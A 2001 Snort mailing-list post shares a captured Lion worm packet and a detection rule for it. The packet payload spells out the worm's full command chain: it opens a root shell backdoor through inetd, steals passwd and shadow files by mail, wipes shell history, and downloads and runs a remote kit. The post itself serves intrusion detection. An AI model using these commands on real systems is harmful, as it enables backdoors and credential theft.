[Snort-users] New Worm Virus is in the wild

Andreas Östling andreaso at ...236...
Fri Mar 23 13:58:21 EST 2001

On Fri, 23 Mar 2001 Kevin.Brown at ...1022... wrote:

> So there is already a signature for this?  I knew there was a Ramen sig,
> does this show up the same?

Here is what Lion in action looks like if you want to write a specific and
optimized rule to catch it:

Attacker:1046 -> victim:53 TCP TTL:49 TOS:0x0 ID:58766 IpLen:20 DgmLen:552
***AP*** Seq: 0xA6DDEA8C  Ack: 0xFE355B80  Win: 0x7D78  TcpLen: 32
TCP Options (3) => NOP NOP TS: 48934346 5847363
PATH='/usr/bin:/bin:/usr/local/bin/:/usr/sbin/:/sbin';export PAT
H;export TERM=vt100;rm -rf /dev/.lib;mkdir /dev/.lib;cd /dev/.li
b;echo '1008 stream tcp nowait root /bin/sh sh' >>/etc/inetd.con
f;killall -HUP inetd;ifconfig -a>1i0n;cat /etc/passwd >>1i0n;cat
 /etc/shadow >>1i0n;mail 1i0nip at ...1434... <1i0n;rm -fr 1i0n;rm -
fr /.bash_history;lynx -dump http://coollion.51.net/crew.tgz >1i
0n.tgz;tar -zxvf 1i0n.tgz;rm -fr 1i0n.tgz;cd lib;./1i0n.sh;exit

I captured this packet by using a rule which simply checks for the string
"/bin/sh" in traffic going to 53/TCP (normally there should be no such packets):

alert tcp any any -> any 53 (msg: "TCP/53 string /bin/sh in packet"; content: "/bin/sh"; flags: AP;)

Andreas Östling

More information about the Snort-users mailing list